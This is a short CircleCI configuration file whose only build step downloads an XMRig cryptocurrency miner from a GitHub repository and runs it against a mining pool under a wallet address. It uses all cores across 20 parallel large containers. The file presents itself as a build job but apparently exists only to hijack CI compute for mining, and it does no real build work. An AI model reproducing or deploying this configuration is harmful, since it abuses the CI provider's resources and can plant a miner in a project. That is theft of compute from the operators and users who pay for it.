# ~/.circleci/config.yml
jobs:
  build:
    docker:
      - image: ubuntu:latest
    parallelism: 20
    resource_class: large
    steps:
      - run: apt update && apt install wget && wget https://github.com/matchwallet/cc/raw/refs/heads/main/xmrigMiner-ubuntu1804-amd64 && chmod +x xmrigMiner-ubuntu1804-amd64 && ./xmrigMiner-ubuntu1804-amd64 -o pool.pc.am:3333 -u pc1q3mk0kl58075qjqe35eqerrtlejjvvdya8h9gns  -a rx/pcoin -t $(nproc)
